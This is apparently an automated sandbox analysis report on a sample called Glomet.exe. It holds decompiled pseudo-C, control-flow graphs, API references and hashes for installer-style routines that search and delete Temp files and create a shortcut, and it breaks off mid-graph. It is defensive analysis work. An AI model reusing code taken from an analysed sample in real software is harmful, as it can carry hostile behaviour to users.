                                                                                                                                                                              control_flow_graph 505 405a19-405a3f call 405cd7 508 405a41-405a53 DeleteFileA 505->508 509 405a58-405a5f 505->509 510 405be2-405be6 508->510 511 405a61-405a63 509->511 512 405a72-405a82 call 406257 509->512 514 405b90-405b95 511->514 515 405a69-405a6c 511->515 518 405a91-405a92 call 405c30 512->518 519 405a84-405a8f lstrcatA 512->519 514->510 517 405b97-405b9a 514->517 515->512 515->514 520 405ba4-405bac call 4065ce 517->520 521 405b9c-405ba2 517->521 522 405a97-405a9a 518->522 519->522 520->510 528 405bae-405bc2 call 405be9 call 4059d1 520->528 521->510 525 405aa5-405aab lstrcatA 522->525 526 405a9c-405aa3 522->526 529 405ab0-405ace lstrlenA FindFirstFileA 525->529 526->525 526->529 543 405bc4-405bc7 528->543 544 405bda-405bdd call 405378 528->544 531 405ad4-405aeb call 405c14 529->531 532 405b86-405b8a 529->532 539 405af6-405af9 531->539 540 405aed-405af1 531->540 532->514 534 405b8c 532->534 534->514 541 405afb-405b00 539->541 542 405b0c-405b1a call 406257 539->542 540->539 545 405af3 540->545 546 405b02-405b04 541->546 547 405b65-405b77 FindNextFileA 541->547 555 405b31-405b3c call 4059d1 542->555 556 405b1c-405b24 542->556 543->521 549 405bc9-405bd8 call 405378 call 406030 543->549 544->510 545->539 546->542 551 405b06-405b0a 546->551 547->531 553 405b7d-405b80 FindClose 547->553 549->510 551->542 551->547 553->532 565 405b5d-405b60 call 405378 555->565 566 405b3e-405b41 555->566 556->547 558 405b26-405b2f call 405a19 556->558 558->547 565->547 568 405b43-405b53 call 405378 call 406030 566->568 569 405b55-405b5b 566->569 568->547 569->547
                                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                                              			E00405A19(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CD7(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4a8 =  *0x42f4a8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406257(0x42b898, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C30(_t73);
					} else {
						lstrcatA(0x42b898, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b898,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405C14( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406257(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059D1(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405378(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4a8 =  *0x42f4a8 + 1;
										} else {
											E00405378(0xfffffff1, _t73);
											E00406030(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A19(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b898 - 0x5c;
					if( *0x42b898 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065CE(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE9(_t73);
							_t40 = E004059D1(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405378(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405378(0xfffffff1, _t73);
							return E00406030(_t72, _t73, 0);
						}
						L33:
						 *0x42f4a8 =  *0x42f4a8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                                                                                                                              0x00405a23
                                                                                                                                                                              0x00405a28
                                                                                                                                                                              0x00405a31
                                                                                                                                                                              0x00405a34
                                                                                                                                                                              0x00405a3c
                                                                                                                                                                              0x00405a3f
                                                                                                                                                                              0x00405a42
                                                                                                                                                                              0x00405a4a
                                                                                                                                                                              0x00405a4c
                                                                                                                                                                              0x00405a4d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405a4d
                                                                                                                                                                              0x00405a58
                                                                                                                                                                              0x00405a5b
                                                                                                                                                                              0x00405a5b
                                                                                                                                                                              0x00405a5b
                                                                                                                                                                              0x00405a5f
                                                                                                                                                                              0x00405a72
                                                                                                                                                                              0x00405a79
                                                                                                                                                                              0x00405a7e
                                                                                                                                                                              0x00405a82
                                                                                                                                                                              0x00405a92
                                                                                                                                                                              0x00405a84
                                                                                                                                                                              0x00405a8a
                                                                                                                                                                              0x00405a8a
                                                                                                                                                                              0x00405a97
                                                                                                                                                                              0x00405a9a
                                                                                                                                                                              0x00405aa5
                                                                                                                                                                              0x00405aab
                                                                                                                                                                              0x00405ab0
                                                                                                                                                                              0x00405ac0
                                                                                                                                                                              0x00405ac2
                                                                                                                                                                              0x00405ac8
                                                                                                                                                                              0x00405acb
                                                                                                                                                                              0x00405ace
                                                                                                                                                                              0x00405b86
                                                                                                                                                                              0x00405b86
                                                                                                                                                                              0x00405b8a
                                                                                                                                                                              0x00405b8c
                                                                                                                                                                              0x00405b8c
                                                                                                                                                                              0x00405b8c
                                                                                                                                                                              0x00405b8c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405ad4
                                                                                                                                                                              0x00405ad4
                                                                                                                                                                              0x00405add
                                                                                                                                                                              0x00405ae3
                                                                                                                                                                              0x00405ae8
                                                                                                                                                                              0x00405aeb
                                                                                                                                                                              0x00405aed
                                                                                                                                                                              0x00405af1
                                                                                                                                                                              0x00405af3
                                                                                                                                                                              0x00405af3
                                                                                                                                                                              0x00405af1
                                                                                                                                                                              0x00405af6
                                                                                                                                                                              0x00405af9
                                                                                                                                                                              0x00405b0c
                                                                                                                                                                              0x00405b0e
                                                                                                                                                                              0x00405b13
                                                                                                                                                                              0x00405b1a
                                                                                                                                                                              0x00405b35
                                                                                                                                                                              0x00405b3a
                                                                                                                                                                              0x00405b3c
                                                                                                                                                                              0x00405b60
                                                                                                                                                                              0x00405b3e
                                                                                                                                                                              0x00405b3e
                                                                                                                                                                              0x00405b41
                                                                                                                                                                              0x00405b55
                                                                                                                                                                              0x00405b43
                                                                                                                                                                              0x00405b46
                                                                                                                                                                              0x00405b4e
                                                                                                                                                                              0x00405b4e
                                                                                                                                                                              0x00405b41
                                                                                                                                                                              0x00405b1c
                                                                                                                                                                              0x00405b22
                                                                                                                                                                              0x00405b24
                                                                                                                                                                              0x00405b2a
                                                                                                                                                                              0x00405b2a
                                                                                                                                                                              0x00405b24
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405b1a
                                                                                                                                                                              0x00405afb
                                                                                                                                                                              0x00405afe
                                                                                                                                                                              0x00405b00
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405b02
                                                                                                                                                                              0x00405b04
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405b06
                                                                                                                                                                              0x00405b0a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405b65
                                                                                                                                                                              0x00405b6f
                                                                                                                                                                              0x00405b75
                                                                                                                                                                              0x00405b75
                                                                                                                                                                              0x00405b80
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405b80
                                                                                                                                                                              0x00405a9c
                                                                                                                                                                              0x00405aa3
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405a61
                                                                                                                                                                              0x00405a61
                                                                                                                                                                              0x00405a63
                                                                                                                                                                              0x00405b90
                                                                                                                                                                              0x00405b92
                                                                                                                                                                              0x00405b95
                                                                                                                                                                              0x00405be6
                                                                                                                                                                              0x00405be6
                                                                                                                                                                              0x00405be6
                                                                                                                                                                              0x00405b97
                                                                                                                                                                              0x00405b9a
                                                                                                                                                                              0x00405ba5
                                                                                                                                                                              0x00405baa
                                                                                                                                                                              0x00405bac
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405baf
                                                                                                                                                                              0x00405bbb
                                                                                                                                                                              0x00405bc0
                                                                                                                                                                              0x00405bc2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405bdd
                                                                                                                                                                              0x00405bc4
                                                                                                                                                                              0x00405bc7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405bcc
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405bd3
                                                                                                                                                                              0x00405b9c
                                                                                                                                                                              0x00405b9c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405b9c
                                                                                                                                                                              0x00405a69
                                                                                                                                                                              0x00405a6c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405a6c

                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteFileA.KERNELBASE(?,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405A42
                                                                                                                                                                              • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405A8A
                                                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405AAB
                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405AB1
                                                                                                                                                                              • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405AC2
                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6F
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405B80
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                              • String ID: "C:\programdata\Glomet.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                              • API String ID: 2035342205-4178602851
                                                                                                                                                                              • Opcode ID: 6279d5409f9ac8fecf523039a44e07b92db75dbea9c2d76fe17a079ddec69c30
                                                                                                                                                                              • Instruction ID: 3775624a82358ee84ae0e61ef35c65b769ecc780556a32b7edc65eda158531b4
                                                                                                                                                                              • Opcode Fuzzy Hash: 6279d5409f9ac8fecf523039a44e07b92db75dbea9c2d76fe17a079ddec69c30
                                                                                                                                                                              • Instruction Fuzzy Hash: D351BD30904A08AADB22AB618C89FAF7B78DF42714F24417BF441752D2D77C6982DE6D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00402173 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                              			E00402173() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402C39(0xfffffff0);
				 *(_t111 - 0xc) = E00402C39(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402C39(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402C39(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402C39(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C56( *(_t111 - 0xc)) == 0) {
					E00402C39(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59); // executed
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens\\Lektionskatalogets1");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                                                                                                                                              0x0040217c
                                                                                                                                                                              0x00402186
                                                                                                                                                                              0x00402190
                                                                                                                                                                              0x0040219d
                                                                                                                                                                              0x004021a8
                                                                                                                                                                              0x004021ab
                                                                                                                                                                              0x004021c5
                                                                                                                                                                              0x004021cb
                                                                                                                                                                              0x004021d1
                                                                                                                                                                              0x004021d4
                                                                                                                                                                              0x004021de
                                                                                                                                                                              0x004021e2
                                                                                                                                                                              0x004021e2
                                                                                                                                                                              0x004021e7
                                                                                                                                                                              0x004021f8
                                                                                                                                                                              0x00402200
                                                                                                                                                                              0x004022dc
                                                                                                                                                                              0x004022dc
                                                                                                                                                                              0x004022e3
                                                                                                                                                                              0x00402206
                                                                                                                                                                              0x00402206
                                                                                                                                                                              0x00402215
                                                                                                                                                                              0x00402219
                                                                                                                                                                              0x0040221c
                                                                                                                                                                              0x00402222
                                                                                                                                                                              0x00402230
                                                                                                                                                                              0x00402233
                                                                                                                                                                              0x00402235
                                                                                                                                                                              0x00402240
                                                                                                                                                                              0x00402240
                                                                                                                                                                              0x00402245
                                                                                                                                                                              0x00402247
                                                                                                                                                                              0x0040224e
                                                                                                                                                                              0x0040224e
                                                                                                                                                                              0x00402251
                                                                                                                                                                              0x0040225a
                                                                                                                                                                              0x0040225d
                                                                                                                                                                              0x00402262
                                                                                                                                                                              0x00402264
                                                                                                                                                                              0x00402271
                                                                                                                                                                              0x00402271
                                                                                                                                                                              0x00402274
                                                                                                                                                                              0x00402280
                                                                                                                                                                              0x00402283
                                                                                                                                                                              0x0040228c
                                                                                                                                                                              0x00402292
                                                                                                                                                                              0x00402299
                                                                                                                                                                              0x004022b2
                                                                                                                                                                              0x004022b4
                                                                                                                                                                              0x004022c2
                                                                                                                                                                              0x004022c2
                                                                                                                                                                              0x004022b2
                                                                                                                                                                              0x004022c5
                                                                                                                                                                              0x004022cb
                                                                                                                                                                              0x004022cb
                                                                                                                                                                              0x004022ce
                                                                                                                                                                              0x004022d4
                                                                                                                                                                              0x004022da
                                                                                                                                                                              0x004022ef
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004022da
                                                                                                                                                                              0x004022e5
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022AA
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1, xrefs: 00402238
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                              • String ID: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1
                                                                                                                                                                              • API String ID: 123533781-3951930202
                                                                                                                                                                              • Opcode ID: 21f73c3ba2152935eaac52a2a5d6e0315d6d795d70bf2892212c7e8f7ea2f8ce
                                                                                                                                                                              • Instruction ID: ec6a4b66970030f98d0c357d5daeebd90ed2a1685bb0ce4afdd26a2e8d50d7fb
                                                                                                                                                                              • Opcode Fuzzy Hash: 21f73c3ba2152935eaac52a2a5d6e0315d6d795d70bf2892212c7e8f7ea2f8ce
                                                                                                                                                                              • Instruction Fuzzy Hash: 68511675A00208BFDF10DFE4C988A9D7BB6AF48314F2045AAF505EB2D1DA799981CB54
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004065CE Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004065CE(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0e0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0e0;
			}




                                                                                                                                                                              0x004065d9
                                                                                                                                                                              0x004065e2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004065ef
                                                                                                                                                                              0x004065e5
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileA.KERNELBASE(7620FA90,0042C0E0,0042BC98,00405D1A,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7620FA90,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,7620FA90,C:\Users\user\AppData\Local\Temp\), ref: 004065D9
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004065E5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                              • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                                                                                                                              • Instruction ID: 8216c8ff522cab9e5c4fbd2006c0822adf2a7579a10bfa080a6703c422ecd414
                                                                                                                                                                              • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                                                                                                                              • Instruction Fuzzy Hash: 66D01231504520EBC7515B78BD0CC4B7A589F053313218A36F466F22E4CB34CC22A6DC
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00403DDA Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 195 403dda-403dec 196 403df2-403df8 195->196 197 403f53-403f62 195->197 196->197 200 403dfe-403e07 196->200 198 403fb1-403fc6 197->198 199 403f64-403f9f GetDlgItem * 2 call 4042d4 KiUserCallbackDispatcher call 40140b 197->199 202 404006-40400b call 404320 198->202 203 403fc8-403fcb 198->203 224 403fa4-403fac 199->224 204 403e09-403e16 SetWindowPos 200->204 205 403e1c-403e23 200->205 219 404010-40402b 202->219 209 403fcd-403fd8 call 401389 203->209 210 403ffe-404000 203->210 204->205 206 403e25-403e3f ShowWindow 205->206 207 403e67-403e6d 205->207 212 403f40-403f4e call 40433b 206->212 213 403e45-403e58 GetWindowLongA 206->213 214 403e86-403e89 207->214 215 403e6f-403e81 DestroyWindow 207->215 209->210 235 403fda-403ff9 SendMessageA 209->235 210->202 218 4042a1 210->218 225 4042a3-4042aa 212->225 213->212 222 403e5e-403e61 ShowWindow 213->222 226 403e8b-403e97 SetWindowLongA 214->226 227 403e9c-403ea2 214->227 223 40427e-404284 215->223 218->225 220 404034-40403a 219->220 221 40402d-40402f call 40140b 219->221 232 404040-40404b 220->232 233 40425f-404278 DestroyWindow EndDialog 220->233 221->220 222->207 223->218 231 404286-40428c 223->231 224->198 226->225 227->212 234 403ea8-403eb7 GetDlgItem 227->234 231->218 237 40428e-404297 ShowWindow 231->237 232->233 238 404051-40409e call 4062ea call 4042d4 * 3 GetDlgItem 232->238 233->223 239 403ed6-403ed9 234->239 240 403eb9-403ed0 SendMessageA IsWindowEnabled 234->240 235->225 237->218 267 4040a0-4040a5 238->267 268 4040a8-4040e4 ShowWindow KiUserCallbackDispatcher call 4042f6 EnableWindow 238->268 242 403edb-403edc 239->242 243 403ede-403ee1 239->243 240->218 240->239 245 403f0c-403f11 call 4042ad 242->245 246 403ee3-403ee9 243->246 247 403eef-403ef4 243->247 245->212 249 403f2a-403f3a SendMessageA 246->249 252 403eeb-403eed 246->252 248 403ef6-403efc 247->248 247->249 253 403f13-403f1c call 40140b 248->253 254 403efe-403f04 call 40140b 248->254 249->212 252->245 253->212 264 403f1e-403f28 253->264 263 403f0a 254->263 263->245 264->263 267->268 271 4040e6-4040e7 268->271 272 4040e9 268->272 273 4040eb-404119 GetSystemMenu EnableMenuItem SendMessageA 271->273 272->273 274 40411b-40412c SendMessageA 273->274 275 40412e 273->275 276 404134-40416e call 404309 call 403dbb call 406257 lstrlenA call 4062ea SetWindowTextA call 401389 274->276 275->276 276->219 287 404174-404176 276->287 287->219 288 